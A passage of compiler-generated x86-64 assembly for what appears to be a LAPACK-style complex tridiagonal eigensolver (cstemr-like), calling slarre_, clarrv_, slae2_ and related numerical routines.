movq %rax, 32(%rsp)
callq _slarrc_
jmp LBB0_64
LBB0_59:
cmpl $0, -204(%rbp)
je LBB0_62
## %bb.60:
cmpl $0, -232(%rbp)
je LBB0_62
## %bb.61:
movl -336(%rbp), %eax
subl -332(%rbp), %eax
addl $1, %eax
movl %eax, -304(%rbp)
jmp LBB0_63
LBB0_62:
movl $0, -304(%rbp)
LBB0_63:
jmp LBB0_64
LBB0_64:
jmp LBB0_65
LBB0_65:
cmpl $0, -328(%rbp)
je LBB0_68
## %bb.66:
movq 128(%rbp), %rax
cmpl $0, (%rax)
jne LBB0_68
## %bb.67:
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -108(%rbp)
cvtsi2ssl -304(%rbp), %xmm0
movq 56(%rbp), %rax
movslq -108(%rbp), %rcx
movss %xmm0, (%rax,%rcx,8)
movq 56(%rbp), %rax
movslq -108(%rbp), %rcx
xorps %xmm0, %xmm0
movss %xmm0, 4(%rax,%rcx,8)
jmp LBB0_72
LBB0_68:
movq 72(%rbp), %rax
movl (%rax), %eax
cmpl -304(%rbp), %eax
jge LBB0_71
## %bb.69:
cmpl $0, -328(%rbp)
jne LBB0_71
## %bb.70:
movq 128(%rbp), %rax
movl $-14, (%rax)
LBB0_71:
jmp LBB0_72
LBB0_72:
jmp LBB0_73
LBB0_73:
movq 128(%rbp), %rax
cmpl $0, (%rax)
je LBB0_75
## %bb.74:
movq 128(%rbp), %rcx
xorl %eax, %eax
subl (%rcx), %eax
movl %eax, -108(%rbp)
leaq L_.str.7(%rip), %rdi
leaq -108(%rbp), %rsi
movl $6, %edx
callq _xerbla_
movl $0, -44(%rbp)
jmp LBB0_221
LBB0_75:
cmpl $0, -324(%rbp)
jne LBB0_77
## %bb.76:
cmpl $0, -328(%rbp)
je LBB0_78
LBB0_77:
movl $0, -44(%rbp)
jmp LBB0_221
LBB0_78:
jmp LBB0_79
LBB0_79:
movq 40(%rbp), %rax
movl $0, (%rax)
movq -72(%rbp), %rax
cmpl $0, (%rax)
jne LBB0_81
## %bb.80:
movl $0, -44(%rbp)
jmp LBB0_221
LBB0_81:
movq -72(%rbp), %rax
cmpl $1, (%rax)
jne LBB0_93
## %bb.82:
cmpl $0, -228(%rbp)
jne LBB0_84
## %bb.83:
cmpl $0, -232(%rbp)
je LBB0_85
LBB0_84:
movq 40(%rbp), %rax
movl $1, (%rax)
movq -80(%rbp), %rax
movss 4(%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq 48(%rbp), %rax
movss %xmm0, 4(%rax)
jmp LBB0_89
LBB0_85:
movss -248(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
movq -80(%rbp), %rax
movss 4(%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss %xmm1, %xmm0
jbe LBB0_88
## %bb.86:
movss -264(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -80(%rbp), %rax
ucomiss 4(%rax), %xmm0
jb LBB0_88
## %bb.87:
movq 40(%rbp), %rax
movl $1, (%rax)
movq -80(%rbp), %rax
movss 4(%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq 48(%rbp), %rax
movss %xmm0, 4(%rax)
LBB0_88:
jmp LBB0_89
LBB0_89:
cmpl $0, -204(%rbp)
je LBB0_92
## %bb.90:
cmpl $0, -328(%rbp)
jne LBB0_92
## %bb.91:
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -108(%rbp)
movq 56(%rbp), %rax
movslq -108(%rbp), %rcx
movss LCPI0_1(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, (%rax,%rcx,8)
movq 56(%rbp), %rax
movslq -108(%rbp), %rcx
xorps %xmm0, %xmm0
movss %xmm0, 4(%rax,%rcx,8)
movq 80(%rbp), %rax
movl $1, 4(%rax)
movq 80(%rbp), %rax
movl $1, 8(%rax)
LBB0_92:
movl $0, -44(%rbp)
jmp LBB0_221
LBB0_93:
movq -72(%rbp), %rax
cmpl $2, (%rax)
jne LBB0_133
## %bb.94:
cmpl $0, -204(%rbp)
jne LBB0_96
## %bb.95:
movq -80(%rbp), %rdi
addq $4, %rdi
movq -88(%rbp), %rsi
addq $4, %rsi
movq -80(%rbp), %rdx
addq $8, %rdx
leaq -208(%rbp), %rcx
leaq -212(%rbp), %r8
callq _slae2_
jmp LBB0_100
LBB0_96:
cmpl $0, -204(%rbp)
je LBB0_99
## %bb.97:
cmpl $0, -328(%rbp)
jne LBB0_99
## %bb.98:
movq -80(%rbp), %rdi
addq $4, %rdi
movq -88(%rbp), %rsi
addq $4, %rsi
movq -80(%rbp), %rdx
addq $8, %rdx
leaq -208(%rbp), %rcx
leaq -212(%rbp), %r8
leaq -220(%rbp), %r9
leaq -244(%rbp), %rax
movq %rax, (%rsp)
callq _slaev2_
LBB0_99:
jmp LBB0_100
LBB0_100:
cmpl $0, -228(%rbp)
jne LBB0_106
## %bb.101:
cmpl $0, -252(%rbp)
je LBB0_104
## %bb.102:
movss -212(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -248(%rbp), %xmm0
jbe LBB0_104
## %bb.103:
movss -212(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
movss -264(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss %xmm1, %xmm0
jae LBB0_106
LBB0_104:
cmpl $0, -232(%rbp)
je LBB0_116
## %bb.105:
cmpl $1, -332(%rbp)
jne LBB0_116
LBB0_106:
movq 40(%rbp), %rax
movl (%rax), %ecx
addl $1, %ecx
movl %ecx, (%rax)
movss -212(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq 48(%rbp), %rax
movq 40(%rbp), %rcx
movslq (%rcx), %rcx
movss %xmm0, (%rax,%rcx,4)
cmpl $0, -204(%rbp)
je LBB0_115
## %bb.107:
cmpl $0, -328(%rbp)
jne LBB0_115
## %bb.108:
movq 40(%rbp), %rax
movl (%rax), %eax
imull -100(%rbp), %eax
addl $1, %eax
movl %eax, -108(%rbp)
movss -244(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movd %xmm0, %eax
xorl $2147483648, %eax ## imm = 0x80000000
movd %eax, %xmm0
movss %xmm0, -116(%rbp)
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq 56(%rbp), %rax
movslq -108(%rbp), %rcx
movss %xmm0, (%rax,%rcx,8)
movq 56(%rbp), %rax
movslq -108(%rbp), %rcx
xorps %xmm0, %xmm0
movss %xmm0, 4(%rax,%rcx,8)
movq 40(%rbp), %rax
movl (%rax), %eax
imull -100(%rbp), %eax
addl $2, %eax
movl %eax, -108(%rbp)
movss -220(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq 56(%rbp), %rax
movslq -108(%rbp), %rcx
movss %xmm0, (%rax,%rcx,8)
movq 56(%rbp), %rax
movslq -108(%rbp), %rcx
xorps %xmm0, %xmm0
movss %xmm0, 4(%rax,%rcx,8)
movss -244(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
jne LBB0_109
jp LBB0_109
jmp LBB0_113
LBB0_109:
movss -220(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
jne LBB0_110
jp LBB0_110
jmp LBB0_111
LBB0_110:
movq 80(%rbp), %rax
movq 40(%rbp), %rcx
movl (%rcx), %ecx
shll $1, %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl $1, (%rax,%rcx,4)
movq 80(%rbp), %rax
movq 40(%rbp), %rcx
movl (%rcx), %ecx
shll $1, %ecx
movslq %ecx, %rcx
movl $2, (%rax,%rcx,4)
jmp LBB0_112
LBB0_111:
movq 80(%rbp), %rax
movq 40(%rbp), %rcx
movl (%rcx), %ecx
shll $1, %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl $1, (%rax,%rcx,4)
movq 80(%rbp), %rax
movq 40(%rbp), %rcx
movl (%rcx), %ecx
shll $1, %ecx
movslq %ecx, %rcx
movl $1, (%rax,%rcx,4)
LBB0_112:
jmp LBB0_114
LBB0_113:
movq 80(%rbp), %rax
movq 40(%rbp), %rcx
movl (%rcx), %ecx
shll $1, %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl $2, (%rax,%rcx,4)
movq 80(%rbp), %rax
movq 40(%rbp), %rcx
movl (%rcx), %ecx
shll $1, %ecx
movslq %ecx, %rcx
movl $2, (%rax,%rcx,4)
LBB0_114:
jmp LBB0_115
LBB0_115:
jmp LBB0_116
LBB0_116:
cmpl $0, -228(%rbp)
jne LBB0_122
## %bb.117:
cmpl $0, -252(%rbp)
je LBB0_120
## %bb.118:
movss -208(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -248(%rbp), %xmm0
jbe LBB0_120
## %bb.119:
movss -208(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
movss -264(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss %xmm1, %xmm0
jae LBB0_122
LBB0_120:
cmpl $0, -232(%rbp)
je LBB0_132
## %bb.121:
cmpl $2, -336(%rbp)
jne LBB0_132
LBB0_122:
movq 40(%rbp), %rax
movl (%rax), %ecx
addl $1, %ecx
movl %ecx, (%rax)
movss -208(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq 48(%rbp), %rax
movq 40(%rbp), %rcx
movslq (%rcx), %rcx
movss %xmm0, (%rax,%rcx,4)
cmpl $0, -204(%rbp)
je LBB0_131
## %bb.123:
cmpl $0, -328(%rbp)
jne LBB0_131
## %bb.124:
movq 40(%rbp), %rax
movl (%rax), %eax
imull -100(%rbp), %eax
addl $1, %eax
movl %eax, -108(%rbp)
movss -220(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq 56(%rbp), %rax
movslq -108(%rbp), %rcx
movss %xmm0, (%rax,%rcx,8)
movq 56(%rbp), %rax
movslq -108(%rbp), %rcx
xorps %xmm0, %xmm0
movss %xmm0, 4(%rax,%rcx,8)
movq 40(%rbp), %rax
movl (%rax), %eax
imull -100(%rbp), %eax
addl $2, %eax
movl %eax, -108(%rbp)
movss -244(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq 56(%rbp), %rax
movslq -108(%rbp), %rcx
movss %xmm0, (%rax,%rcx,8)
movq 56(%rbp), %rax
movslq -108(%rbp), %rcx
xorps %xmm0, %xmm0
movss %xmm0, 4(%rax,%rcx,8)
movss -244(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
jne LBB0_125
jp LBB0_125
jmp LBB0_129
LBB0_125:
movss -220(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
jne LBB0_126
jp LBB0_126
jmp LBB0_127
LBB0_126:
movq 80(%rbp), %rax
movq 40(%rbp), %rcx
movl (%rcx), %ecx
shll $1, %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl $1, (%rax,%rcx,4)
movq 80(%rbp), %rax
movq 40(%rbp), %rcx
movl (%rcx), %ecx
shll $1, %ecx
movslq %ecx, %rcx
movl $2, (%rax,%rcx,4)
jmp LBB0_128
LBB0_127:
movq 80(%rbp), %rax
movq 40(%rbp), %rcx
movl (%rcx), %ecx
shll $1, %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl $1, (%rax,%rcx,4)
movq 80(%rbp), %rax
movq 40(%rbp), %rcx
movl (%rcx), %ecx
shll $1, %ecx
movslq %ecx, %rcx
movl $1, (%rax,%rcx,4)
LBB0_128:
jmp LBB0_130
LBB0_129:
movq 80(%rbp), %rax
movq 40(%rbp), %rcx
movl (%rcx), %ecx
shll $1, %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl $2, (%rax,%rcx,4)
movq 80(%rbp), %rax
movq 40(%rbp), %rcx
movl (%rcx), %ecx
shll $1, %ecx
movslq %ecx, %rcx
movl $2, (%rax,%rcx,4)
LBB0_130:
jmp LBB0_131
LBB0_131:
jmp LBB0_132
LBB0_132:
jmp LBB0_198
LBB0_133:
movl $1, -280(%rbp)
movq -72(%rbp), %rax
movl (%rax), %eax
shll $1, %eax
addl $1, %eax
movl %eax, -272(%rbp)
movq -72(%rbp), %rax
imull $3, (%rax), %eax
addl $1, %eax
movl %eax, -184(%rbp)
movq -72(%rbp), %rax
movl (%rax), %eax
shll $2, %eax
addl $1, %eax
movl %eax, -124(%rbp)
movq -72(%rbp), %rax
imull $5, (%rax), %eax
addl $1, %eax
movl %eax, -156(%rbp)
movq -72(%rbp), %rax
imull $6, (%rax), %eax
addl $1, %eax
movl %eax, -292(%rbp)
movl $1, -288(%rbp)
movq -72(%rbp), %rax
movl (%rax), %eax
addl $1, %eax
movl %eax, -240(%rbp)
movq -72(%rbp), %rax
movl (%rax), %eax
shll $1, %eax
addl $1, %eax
movl %eax, -192(%rbp)
movq -72(%rbp), %rax
imull $3, (%rax), %eax
addl $1, %eax
movl %eax, -276(%rbp)
movss LCPI0_1(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -180(%rbp)
movq -72(%rbp), %rsi
movq -80(%rbp), %rdx
addq $4, %rdx
movq -88(%rbp), %rcx
addq $4, %rcx
leaq L_.str.8(%rip), %rdi
callq _slanst_
movss %xmm0, -152(%rbp)
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
jbe LBB0_136
## %bb.134:
movss -152(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss %xmm1, %xmm0
jbe LBB0_136
## %bb.135:
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
divss -152(%rbp), %xmm0
movss %xmm0, -180(%rbp)
jmp LBB0_139
LBB0_136:
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -144(%rbp), %xmm0
jbe LBB0_138
## %bb.137:
movss -144(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
divss -152(%rbp), %xmm0
movss %xmm0, -180(%rbp)
LBB0_138:
jmp LBB0_139
LBB0_139:
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss LCPI0_1(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero
ucomiss %xmm1, %xmm0
jne LBB0_140
jp LBB0_140
jmp LBB0_143
LBB0_140:
movq -72(%rbp), %rdi
movq -80(%rbp), %rdx
addq $4, %rdx
leaq -180(%rbp), %rsi
leaq _c__1(%rip), %rcx
callq _sscal_
movq -72(%rbp), %rax
movl (%rax), %eax
subl $1, %eax
movl %eax, -108(%rbp)
movq -88(%rbp), %rdx
addq $4, %rdx
leaq -108(%rbp), %rdi
leaq -180(%rbp), %rsi
leaq _c__1(%rip), %rcx
callq _sscal_
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
mulss -152(%rbp), %xmm0
movss %xmm0, -152(%rbp)
cmpl $0, -252(%rbp)
je LBB0_142
## %bb.141:
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
mulss -248(%rbp), %xmm0
movss %xmm0, -248(%rbp)
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
mulss -264(%rbp), %xmm0
movss %xmm0, -264(%rbp)
LBB0_142:
jmp LBB0_143
LBB0_143:
movq 88(%rbp), %rax
cmpl $0, (%rax)
je LBB0_145
## %bb.144:
movq -72(%rbp), %rdi
movq -80(%rbp), %rsi
addq $4, %rsi
movq -88(%rbp), %rdx
addq $4, %rdx
leaq -188(%rbp), %rcx
callq _slarrr_
jmp LBB0_146
LBB0_145:
movl $-1, -188(%rbp)
LBB0_146:
cmpl $0, -188(%rbp)
jne LBB0_148
## %bb.147:
movss -340(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -312(%rbp)
jmp LBB0_149
LBB0_148:
movss -340(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movd %xmm0, %eax
xorl $2147483648, %eax ## imm = 0x80000000
movd %eax, %xmm0
movss %xmm0, -312(%rbp)
movq 88(%rbp), %rax
movl $0, (%rax)
LBB0_149:
movq 88(%rbp), %rax
cmpl $0, (%rax)
je LBB0_151
## %bb.150:
movq -72(%rbp), %rdi
movq -80(%rbp), %rsi
addq $4, %rsi
movq 96(%rbp), %rcx
movslq -124(%rbp), %rax
shlq $2, %rax
addq %rax, %rcx
leaq _c__1(%rip), %r8
movq %r8, %rdx
callq _scopy_
LBB0_151:
movq -72(%rbp), %rax
movl (%rax), %eax
subl $1, %eax
movl %eax, -108(%rbp)
movl $1, -176(%rbp)
LBB0_152: ## =>This Inner Loop Header: Depth=1
movl -176(%rbp), %eax
cmpl -108(%rbp), %eax
jg LBB0_155
## %bb.153: ## in Loop: Header=BB0_152 Depth=1
movq -88(%rbp), %rax
movslq -176(%rbp), %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -116(%rbp)
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
mulss -116(%rbp), %xmm0
movq 96(%rbp), %rax
movl -156(%rbp), %ecx
addl -176(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movss %xmm0, (%rax,%rcx,4)
## %bb.154: ## in Loop: Header=BB0_152 Depth=1
movl -176(%rbp), %eax
addl $1, %eax
movl %eax, -176(%rbp)
jmp LBB0_152
LBB0_155:
cmpl $0, -204(%rbp)
jne LBB0_157
## %bb.156:
movss LCPI0_2(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero
mulss -340(%rbp), %xmm0
movss %xmm0, -164(%rbp)
movss LCPI0_2(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero
mulss -340(%rbp), %xmm0
movss %xmm0, -168(%rbp)
jmp LBB0_164
LBB0_157:
movss -340(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
sqrtsd %xmm0, %xmm0
movsd LCPI0_3(%rip), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm1, %xmm0
cvtsd2ss %xmm0, %xmm0
movss %xmm0, -116(%rbp)
movss LCPI0_2(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero
mulss -340(%rbp), %xmm0
movss %xmm0, -120(%rbp)
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -120(%rbp), %xmm0
jb LBB0_159
## %bb.158:
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -356(%rbp) ## 4-byte Spill
jmp LBB0_160
LBB0_159:
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -356(%rbp) ## 4-byte Spill
LBB0_160:
movss -356(%rbp), %xmm0 ## 4-byte Reload
## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -164(%rbp)
movss -340(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
sqrtsd %xmm0, %xmm0
movsd LCPI0_4(%rip), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm1, %xmm0
cvtsd2ss %xmm0, %xmm0
movss %xmm0, -116(%rbp)
movss LCPI0_2(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero
mulss -340(%rbp), %xmm0
movss %xmm0, -120(%rbp)
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -120(%rbp), %xmm0
jb LBB0_162
## %bb.161:
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -360(%rbp) ## 4-byte Spill
jmp LBB0_163
LBB0_162:
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -360(%rbp) ## 4-byte Spill
LBB0_163:
movss -360(%rbp), %xmm0 ## 4-byte Reload
## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -168(%rbp)
LBB0_164:
movq -64(%rbp), %rdi
movq -72(%rbp), %rsi
movq -80(%rbp), %rax
addq $4, %rax
movq %rax, -456(%rbp) ## 8-byte Spill
movq -88(%rbp), %rax
addq $4, %rax
movq %rax, -448(%rbp) ## 8-byte Spill
movq 96(%rbp), %rax
movslq -156(%rbp), %rcx
shlq $2, %rcx
addq %rcx, %rax
movq %rax, -440(%rbp) ## 8-byte Spill
movq 112(%rbp), %rax
movslq -288(%rbp), %rcx
shlq $2, %rcx
addq %rcx, %rax
movq %rax, -400(%rbp) ## 8-byte Spill
movq 40(%rbp), %rax
movq %rax, -392(%rbp) ## 8-byte Spill
movq 48(%rbp), %rax
addq $4, %rax
movq %rax, -384(%rbp) ## 8-byte Spill
movq 96(%rbp), %rax
movslq -272(%rbp), %rcx
shlq $2, %rcx
addq %rcx, %rax
movq %rax, -376(%rbp) ## 8-byte Spill
movq 96(%rbp), %r13
movslq -184(%rbp), %rax
shlq $2, %rax
addq %rax, %r13
movq 112(%rbp), %r12
movslq -240(%rbp), %rax
shlq $2, %rax
addq %rax, %r12
movq 112(%rbp), %r15
movslq -192(%rbp), %rax
shlq $2, %rax
addq %rax, %r15
movq 96(%rbp), %r14
movslq -280(%rbp), %rax
shlq $2, %rax
addq %rax, %r14
movq 96(%rbp), %r11
movslq -292(%rbp), %rax
shlq $2, %rax
addq %rax, %r11
movq 112(%rbp), %r10
movslq -276(%rbp), %rax
shlq $2, %rax
addq %rax, %r10
leaq -248(%rbp), %rdx
leaq -264(%rbp), %rcx
leaq -332(%rbp), %r8
leaq -336(%rbp), %r9
leaq -164(%rbp), %rax
movq %rax, -432(%rbp) ## 8-byte Spill
leaq -168(%rbp), %rax
movq %rax, -424(%rbp) ## 8-byte Spill
leaq -312(%rbp), %rax
movq %rax, -416(%rbp) ## 8-byte Spill
leaq -316(%rbp), %rax
movq %rax, -408(%rbp) ## 8-byte Spill
leaq -308(%rbp), %rbx
leaq -188(%rbp), %rax
movq %rax, -368(%rbp) ## 8-byte Spill
movq -456(%rbp), %rax ## 8-byte Reload
movq %rax, (%rsp)
movq -448(%rbp), %rax ## 8-byte Reload
movq %rax, 8(%rsp)
movq -440(%rbp), %rax ## 8-byte Reload
movq %rax, 16(%rsp)
movq -432(%rbp), %rax ## 8-byte Reload
movq %rax, 24(%rsp)
movq -424(%rbp), %rax ## 8-byte Reload
movq %rax, 32(%rsp)
movq -416(%rbp), %rax ## 8-byte Reload
movq %rax, 40(%rsp)
movq -408(%rbp), %rax ## 8-byte Reload
movq %rax, 48(%rsp)
movq -400(%rbp), %rax ## 8-byte Reload
movq %rax, 56(%rsp)
movq -392(%rbp), %rax ## 8-byte Reload
movq %rax, 64(%rsp)
movq -384(%rbp), %rax ## 8-byte Reload
movq %rax, 72(%rsp)
movq -376(%rbp), %rax ## 8-byte Reload
movq %rax, 80(%rsp)
movq -368(%rbp), %rax ## 8-byte Reload
movq %r13, 88(%rsp)
movq %r12, 96(%rsp)
movq %r15, 104(%rsp)
movq %r14, 112(%rsp)
movq %rbx, 120(%rsp)
movq %r11, 128(%rsp)
movq %r10, 136(%rsp)
movq %rax, 144(%rsp)
callq _slarre_
cmpl $0, -188(%rbp)
je LBB0_169
## %bb.165:
cmpl $0, -188(%rbp)
jl LBB0_167
## %bb.166:
movl -188(%rbp), %eax
movl %eax, -460(%rbp) ## 4-byte Spill
jmp LBB0_168
LBB0_167:
xorl %eax, %eax
subl -188(%rbp), %eax
movl %eax, -460(%rbp) ## 4-byte Spill
LBB0_168:
movl -460(%rbp), %ecx ## 4-byte Reload
addl $10, %ecx
movq 128(%rbp), %rax
movl %ecx, (%rax)
movl $0, -44(%rbp)
jmp LBB0_221
LBB0_169:
cmpl $0, -204(%rbp)
je LBB0_176
## %bb.170:
movq -72(%rbp), %rdi
movq -80(%rbp), %rcx
addq $4, %rcx
movq -88(%rbp), %r8
addq $4, %r8
movq 112(%rbp), %rax
movslq -288(%rbp), %rdx
shlq $2, %rdx
addq %rdx, %rax
movq %rax, -560(%rbp) ## 8-byte Spill
movq 40(%rbp), %rax
movq %rax, -552(%rbp) ## 8-byte Spill
movq 40(%rbp), %rax
movq %rax, -536(%rbp) ## 8-byte Spill
movq 48(%rbp), %rax
addq $4, %rax
movq %rax, -504(%rbp) ## 8-byte Spill
movq 96(%rbp), %rax
movslq -272(%rbp), %rdx
shlq $2, %rdx
addq %rdx, %rax
movq %rax, -496(%rbp) ## 8-byte Spill
movq 96(%rbp), %rax
movslq -184(%rbp), %rdx
shlq $2, %rdx
addq %rdx, %rax
movq %rax, -488(%rbp) ## 8-byte Spill
movq 112(%rbp), %rax
movslq -240(%rbp), %rdx
shlq $2, %rdx
addq %rdx, %rax
movq %rax, -480(%rbp) ## 8-byte Spill
movq 112(%rbp), %r13
movslq -192(%rbp), %rax
shlq $2, %rax
addq %rax, %r13
movq 96(%rbp), %r12
movslq -280(%rbp), %rax
shlq $2, %rax
addq %rax, %r12
movq 56(%rbp), %r15
movslq -104(%rbp), %rax
shlq $3, %rax
addq %rax, %r15
movq 64(%rbp), %r14
movq 80(%rbp), %rbx
addq $4, %rbx
movq 96(%rbp), %r11
movslq -292(%rbp), %rax
shlq $2, %rax
addq %rax, %r11
movq 112(%rbp), %r10
movslq -276(%rbp), %rax
shlq $2, %rax
addq %rax, %r10
leaq -248(%rbp), %rsi
leaq -264(%rbp), %rdx
leaq -308(%rbp), %r9
leaq _c__1(%rip), %rax
movq %rax, -544(%rbp) ## 8-byte Spill
leaq _c_b18(%rip), %rax
movq %rax, -528(%rbp) ## 8-byte Spill
leaq -164(%rbp), %rax
movq %rax, -520(%rbp) ## 8-byte Spill
leaq -168(%rbp), %rax
movq %rax, -512(%rbp) ## 8-byte Spill
leaq -188(%rbp), %rax
movq %rax, -472(%rbp) ## 8-byte Spill
movq -560(%rbp), %rax ## 8-byte Reload
movq %rax, (%rsp)
movq -552(%rbp), %rax ## 8-byte Reload
movq %rax, 8(%rsp)
movq -544(%rbp), %rax ## 8-byte Reload
movq %rax, 16(%rsp)
movq -536(%rbp), %rax ## 8-byte Reload
movq %rax, 24(%rsp)
movq -528(%rbp), %rax ## 8-byte Reload
movq %rax, 32(%rsp)
movq -520(%rbp), %rax ## 8-byte Reload
movq %rax, 40(%rsp)
movq -512(%rbp), %rax ## 8-byte Reload
movq %rax, 48(%rsp)
movq -504(%rbp), %rax ## 8-byte Reload
movq %rax, 56(%rsp)
movq -496(%rbp), %rax ## 8-byte Reload
movq %rax, 64(%rsp)
movq -488(%rbp), %rax ## 8-byte Reload
movq %rax, 72(%rsp)
movq -480(%rbp), %rax ## 8-byte Reload
movq %rax, 80(%rsp)
movq -472(%rbp), %rax ## 8-byte Reload
movq %r13, 88(%rsp)
movq %r12, 96(%rsp)
movq %r15, 104(%rsp)
movq %r14, 112(%rsp)
movq %rbx, 120(%rsp)
movq %r11, 128(%rsp)
movq %r10, 136(%rsp)
movq %rax, 144(%rsp)
callq _clarrv_
cmpl $0, -188(%rbp)
je LBB0_175
## %bb.171:
cmpl $0, -188(%rbp)
jl LBB0_173
## %bb.172:
movl -188(%rbp), %eax
movl %eax, -564(%rbp) ## 4-byte Spill
jmp LBB0_174
LBB0_173:
xorl %eax, %eax
subl -188(%rbp), %eax
movl %eax, -564(%rbp) ## 4-byte Spill
LBB0_174:
movl -564(%rbp), %ecx ## 4-byte Reload
addl $20, %ecx
movq 128(%rbp), %rax
movl %ecx, (%rax)
movl $0, -44(%rbp)
jmp LBB0_221
LBB0_175:
jmp LBB0_181
LBB0_176:
movq 40(%rbp), %rax
movl (%rax), %eax
movl %eax, -108(%rbp)
movl $1, -176(%rbp)
LBB0_177: ## =>This Inner Loop Header: Depth=1
movl -176(%rbp), %eax
cmpl -108(%rbp), %eax
jg LBB0_180
## %bb.178: ## in Loop: Header=BB0_177 Depth=1
movq 112(%rbp), %rax
movl -240(%rbp), %ecx
addl -176(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -148(%rbp)
movq -88(%rbp), %rax
movq 112(%rbp), %rcx
movl -288(%rbp), %edx
addl -148(%rbp), %edx
subl $1, %edx
movslq %edx, %rdx
movslq (%rcx,%rdx,4), %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq 48(%rbp), %rax
movslq -176(%rbp), %rcx
addss (%rax,%rcx,4), %xmm0
movss %xmm0, (%rax,%rcx,4)
## %bb.179: ## in Loop: Header=BB0_177 Depth=1
movl -176(%rbp), %eax
addl $1, %eax
movl %eax, -176(%rbp)
jmp LBB0_177
LBB0_180:
jmp LBB0_181
LBB0_181:
movq 88(%rbp), %rax
cmpl $0, (%rax)
je LBB0_195
## %bb.182:
movl $1, -236(%rbp)
movl $1, -256(%rbp)
movq 112(%rbp), %rax
movl -240(%rbp), %ecx
movq 40(%rbp), %rdx
addl (%rdx), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -108(%rbp)
movl $1, -132(%rbp)
LBB0_183: ## =>This Loop Header: Depth=1
## Child Loop BB0_185 Depth 2
movl -132(%rbp), %eax
cmpl -108(%rbp), %eax
jg LBB0_194
## %bb.184: ## in Loop: Header=BB0_183 Depth=1
movq 112(%rbp), %rax
movl -288(%rbp), %ecx
addl -132(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
